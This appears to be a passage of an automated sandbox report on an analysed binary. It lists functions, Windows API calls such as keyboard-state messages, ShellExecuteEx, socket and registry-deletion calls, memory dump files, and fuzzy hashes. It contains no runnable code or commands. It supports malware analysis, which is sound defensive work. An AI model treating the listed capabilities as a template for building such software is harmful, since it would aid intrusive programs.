                                          • Opcode ID: 61d0b3ca4f786823c15cf2b91649a5a7a1732c928005184cfa2f81153b5f0cbd
                                          • Instruction ID: 38d92b193701292d275814aeb2aa77a45b7443a26f9434da7801f6a35b1cda9a
                                          • Opcode Fuzzy Hash: 61d0b3ca4f786823c15cf2b91649a5a7a1732c928005184cfa2f81153b5f0cbd
                                          • Instruction Fuzzy Hash: 68A17B702042019FCB16EF24C891FAEBBE5EF89314F14891DF5969B2A2DB31E955CF42
                                          Function 000B2E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,000EC508,00000004,00000000,00000000,00000000), ref: 000B2E9F
                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,000EC508,00000004,00000000,00000000,00000000,000000FF), ref: 000B2EE7
                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,000EC508,00000004,00000000,00000000,00000000), ref: 000EC55B
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,000EC508,00000004,00000000,00000000,00000000), ref: 000EC5C7
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: 6076438b49f552dad720fd5ddb8da31e1aa009937f5a0c5416ed1df6d55332c4
                                          • Instruction ID: 9c41a92b284164f01c2ecf516fdedac09d52cabea8d51a0c479d4a3f625dccb4
                                          • Opcode Fuzzy Hash: 6076438b49f552dad720fd5ddb8da31e1aa009937f5a0c5416ed1df6d55332c4
                                          • Instruction Fuzzy Hash: 4041F831604AC09ED7BA872B8DCCBEE7BE2AB96300F24440DE56756AA1C771F8C1D711
                                          Function 00117681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00117698
                                            • Part of subcall function 000D0FE6: std::exception::exception.LIBCMT ref: 000D101C
                                            • Part of subcall function 000D0FE6: __CxxThrowException@8.LIBCMT ref: 000D1031
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001176CF
                                          • EnterCriticalSection.KERNEL32(?), ref: 001176EB
                                          • _memmove.LIBCMT ref: 00117739
                                          • _memmove.LIBCMT ref: 00117756
                                          • LeaveCriticalSection.KERNEL32(?), ref: 00117765
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0011777A
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00117799
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 256516436-0
                                          • Opcode ID: 636cc0f9b50e5cf6edb25c135561115cf1c733baf15422885a125806139f3f55
                                          • Instruction ID: c01ad9715a3390bbe8187181b79a34d1b575266ec33798e9e08c7a3f5b44754f
                                          • Opcode Fuzzy Hash: 636cc0f9b50e5cf6edb25c135561115cf1c733baf15422885a125806139f3f55
                                          • Instruction Fuzzy Hash: BB318335904205EBDB10EF95DC85EAEBB78EF45700F2440B6F904AB296DB70DE94CBA0
                                          Function 001367F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 00136810
                                          • GetDC.USER32(00000000), ref: 00136818
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00136823
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0013682F
                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0013686B
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0013687C
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0013964F,?,?,000000FF,00000000,?,000000FF,?), ref: 001368B6
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001368D6
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          • Opcode ID: 1591ff01c461d3ef8c36b74dc42cc95c169c42fca3b0f001537d56f55df113dc
                                          • Instruction ID: 5f1024d5a40f8b26a366238aa85ec2bb0a33e4106e5f71c9f5712b45e8c282d2
                                          • Opcode Fuzzy Hash: 1591ff01c461d3ef8c36b74dc42cc95c169c42fca3b0f001537d56f55df113dc
                                          • Instruction Fuzzy Hash: BB316B76101214BFEB118F51CC8AFAA3BA9EF4E765F044065FF089A2A1D7759891CBB0
                                          Function 0010C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: 19d85950250ad0bb3d6f6fc7141e744d200d1db42bd10c9b4056fe99cba74f20
                                          • Instruction ID: 95998ac9603c4d5a8d3bd2cdc8ae5a40122c5bd13c44cca6d25b264534106c9b
                                          • Opcode Fuzzy Hash: 19d85950250ad0bb3d6f6fc7141e744d200d1db42bd10c9b4056fe99cba74f20
                                          • Instruction Fuzzy Hash: A721D4726052057BD20877208E82FEB376CDF25794B048222FD46A63D3EB90DE118EF5
                                          Function 0011F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                            • Part of subcall function 000C436A: _wcscpy.LIBCMT ref: 000C438D
                                          • _wcstok.LIBCMT ref: 0011F2D7
                                          • _wcscpy.LIBCMT ref: 0011F366
                                          • _memset.LIBCMT ref: 0011F399
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                          • String ID: X
                                          • API String ID: 774024439-3081909835
                                          • Opcode ID: 84c16ac7ef5066beb4123ba43b74d8caea1fe35d74b662bc4f553be9762edafc
                                          • Instruction ID: ee88b981c045aef990b786532327939c94547c73a8d74759521a5d2e0ba77c91
                                          • Opcode Fuzzy Hash: 84c16ac7ef5066beb4123ba43b74d8caea1fe35d74b662bc4f553be9762edafc
                                          • Instruction Fuzzy Hash: 74C16C715083419FC718EF64C895ADEB7E5BF89350F00492DF899972A3DB30E946CB92
                                          Function 001271EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 001272EB
                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0012730C
                                          • WSAGetLastError.WSOCK32(00000000), ref: 0012731F
                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 001273D5
                                          • inet_ntoa.WSOCK32(?), ref: 00127392
                                            • Part of subcall function 0010B4EA: _strlen.LIBCMT ref: 0010B4F4
                                            • Part of subcall function 0010B4EA: _memmove.LIBCMT ref: 0010B516
                                          • _strlen.LIBCMT ref: 0012742F
                                          • _memmove.LIBCMT ref: 00127498
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                          • String ID:
                                          • API String ID: 3619996494-0
                                          • Opcode ID: 379b3f19417f2ae0c3646f3872254de2853ab4ae67d7e01e9b4977464fe8cfc8
                                          • Instruction ID: e295fb6c54cfc7f79cf4945128273d643cecfe0e33a9cb5d5c3113ec0d442007
                                          • Opcode Fuzzy Hash: 379b3f19417f2ae0c3646f3872254de2853ab4ae67d7e01e9b4977464fe8cfc8
                                          • Instruction Fuzzy Hash: E781A071508210ABD314EB24DC96FABB7A8EF84714F10451DF9559B2E3EB70ED41CBA1
                                          Function 000B1800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 913bd731271dff28e3e3f8c17b041f95e1a4270a8bbc7a60a6bb894befd32fcc
                                          • Instruction ID: a91b7ec4cae45d14d2ef26747dff829d98e0f609f76fcbc4ede41ebbbba5cf25
                                          • Opcode Fuzzy Hash: 913bd731271dff28e3e3f8c17b041f95e1a4270a8bbc7a60a6bb894befd32fcc
                                          • Instruction Fuzzy Hash: 1E716D74900109EFCB15CF59CC98AEEBBB9FF8A314F648159F915AB251CB309A51CBA0
                                          Function 0013B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindow.USER32(00C055F0), ref: 0013BA5D
                                          • IsWindowEnabled.USER32(00C055F0), ref: 0013BA69
                                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0013BB4D
                                          • SendMessageW.USER32(00C055F0,000000B0,?,?), ref: 0013BB84
                                          • IsDlgButtonChecked.USER32(?,?), ref: 0013BBC1
                                          • GetWindowLongW.USER32(00C055F0,000000EC), ref: 0013BBE3
                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0013BBFB
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                          • String ID:
                                          • API String ID: 4072528602-0
                                          • Opcode ID: a85e91679d719458dd0faef4ec83f68fe61678c5fde0f4434c3d40366c467c7f
                                          • Instruction ID: 24cad3ac3b2f08eacf08a2021662b7055b52796e60954b85c19094dd9dab4e6c
                                          • Opcode Fuzzy Hash: a85e91679d719458dd0faef4ec83f68fe61678c5fde0f4434c3d40366c467c7f
                                          • Instruction Fuzzy Hash: 5671C234609604EFDB259F54C8D4FBAB7B5EF4A300F144059EB4A972A5EB31AD90CB60
                                          Function 0012FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0012FB31
                                          • _memset.LIBCMT ref: 0012FBFA
                                          • ShellExecuteExW.SHELL32(?), ref: 0012FC3F
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                            • Part of subcall function 000C436A: _wcscpy.LIBCMT ref: 000C438D
                                          • GetProcessId.KERNEL32(00000000), ref: 0012FCB6
                                          • CloseHandle.KERNEL32(00000000), ref: 0012FCE5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                          • String ID: @
                                          • API String ID: 3522835683-2766056989
                                          • Opcode ID: 128b07854de5864f55a4bace8c3644828da99bdede756ceecfce84f709d83eb7
                                          • Instruction ID: 2d30b9d500a1afb09125cb95e4a60c793e2f3f64bb518c32143c2e09a097b0e0
                                          • Opcode Fuzzy Hash: 128b07854de5864f55a4bace8c3644828da99bdede756ceecfce84f709d83eb7
                                          • Instruction Fuzzy Hash: 2B61BF75A006299FCB14EF54D4909EDBBF5FF48310F14846DE846AB352CB30AE52CB90
                                          Function 0011174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(?), ref: 0011178B
                                          • GetKeyboardState.USER32(?), ref: 001117A0
                                          • SetKeyboardState.USER32(?), ref: 00111801
                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0011182F
                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0011184E
                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00111894
                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001118B7
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: be9a47122856b6d568803d45c074d7706a72afec1120bf0812412f2faea7ea64
                                          • Instruction ID: eec1267e7e381d1919ff628caf52d3e7e9a67e775cf5021265c3966e51c708aa
                                          • Opcode Fuzzy Hash: be9a47122856b6d568803d45c074d7706a72afec1120bf0812412f2faea7ea64
                                          • Instruction Fuzzy Hash: B551D5A0A187D53DFB3A8234CC55BFAFEE95B06304F0885A9E2D5468D2D398ECD4D750
                                          Function 00111565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(00000000), ref: 001115A4
                                          • GetKeyboardState.USER32(?), ref: 001115B9
                                          • SetKeyboardState.USER32(?), ref: 0011161A
                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00111646
                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00111663
                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001116A7
                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001116C8
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: dd9cb519c7b7be274d27f969abda78a525b14e476e6a655bce528159ec87c804
                                          • Instruction ID: 5e8db00edaaeb6013713161511ffc9d7f8b101aeab3da67edc01c7555e940723
                                          • Opcode Fuzzy Hash: dd9cb519c7b7be274d27f969abda78a525b14e476e6a655bce528159ec87c804
                                          • Instruction Fuzzy Hash: 845106A09087D53DFB3A83248C01BFAFEA95F06300F0C44A9E2D5469C2D7D5ACC4E761
                                          Function 00115BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _wcsncpy$LocalTime
                                          • String ID:
                                          • API String ID: 2945705084-0
                                          • Opcode ID: b5a2f89175cc8ebcbd52db5238f795d8e9e3e6c99f69bb3d13ffad7701d0ae52
                                          • Instruction ID: 5720f8bea791901cda3a9c24e2c1794cb86937a0f18fc18babb0ec2cbbb11316
                                          • Opcode Fuzzy Hash: b5a2f89175cc8ebcbd52db5238f795d8e9e3e6c99f69bb3d13ffad7701d0ae52
                                          • Instruction Fuzzy Hash: 5D4170A5C10618B6CB51EBF488469DFB3BD9F04320F504866E509E3222E734A655C3FA
                                          Function 00113B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00114BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00113B8A,?), ref: 00114BE0
                                            • Part of subcall function 00114BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00113B8A,?), ref: 00114BF9
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00113BAA
                                          • _wcscmp.LIBCMT ref: 00113BC6
                                          • MoveFileW.KERNEL32(?,?), ref: 00113BDE
                                          • _wcscat.LIBCMT ref: 00113C26
                                          • SHFileOperationW.SHELL32(?), ref: 00113C92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 1377345388-1173974218
                                          • Opcode ID: ac85087d862f7c267a6fddbd6da629b1b78cd54342c79ca1bcc4587efca2197f
                                          • Instruction ID: b074561d652e336f62000b3bf8cecd6aaec9fe58a8d978e064bc5bad787eec47
                                          • Opcode Fuzzy Hash: ac85087d862f7c267a6fddbd6da629b1b78cd54342c79ca1bcc4587efca2197f
                                          • Instruction Fuzzy Hash: AB416D7150C344AAC75AEF64C481ADBB7ECAF99340F40093EF499D3292EB34D689C766
                                          Function 001378B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 001378CF
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00137976
                                          • IsMenu.USER32(?), ref: 0013798E
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001379D6
                                          • DrawMenuBar.USER32 ref: 001379E9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                          • String ID: 0
                                          • API String ID: 3866635326-4108050209
                                          • Opcode ID: 2777babd94b91f647a5d10a65d1e43ceac896c9c30d4afda1bb1e19a14a6b5a8
                                          • Instruction ID: 9c0e9b01cc4f5fb202d1d8eb104ca6566ae661c7f360f9c92c15f2e5a912c886
                                          • Opcode Fuzzy Hash: 2777babd94b91f647a5d10a65d1e43ceac896c9c30d4afda1bb1e19a14a6b5a8
                                          • Instruction Fuzzy Hash: FD415FB5A04209EFDB20DF54D884F9ABBF5FF09325F048269E95597290C730AD94CF90
                                          Function 00131602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00131631
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0013165B
                                          • FreeLibrary.KERNEL32(00000000), ref: 00131712
                                            • Part of subcall function 00131602: RegCloseKey.ADVAPI32(?), ref: 00131678
                                            • Part of subcall function 00131602: FreeLibrary.KERNEL32(?), ref: 001316CA
                                            • Part of subcall function 00131602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 001316ED
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 001316B5
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                          • String ID:
                                          • API String ID: 395352322-0
                                          • Opcode ID: 448aa7e50cc9840cc9f220d6f40b6564feb4a1bbe5b75cb4db7d2cc5edc9e28a
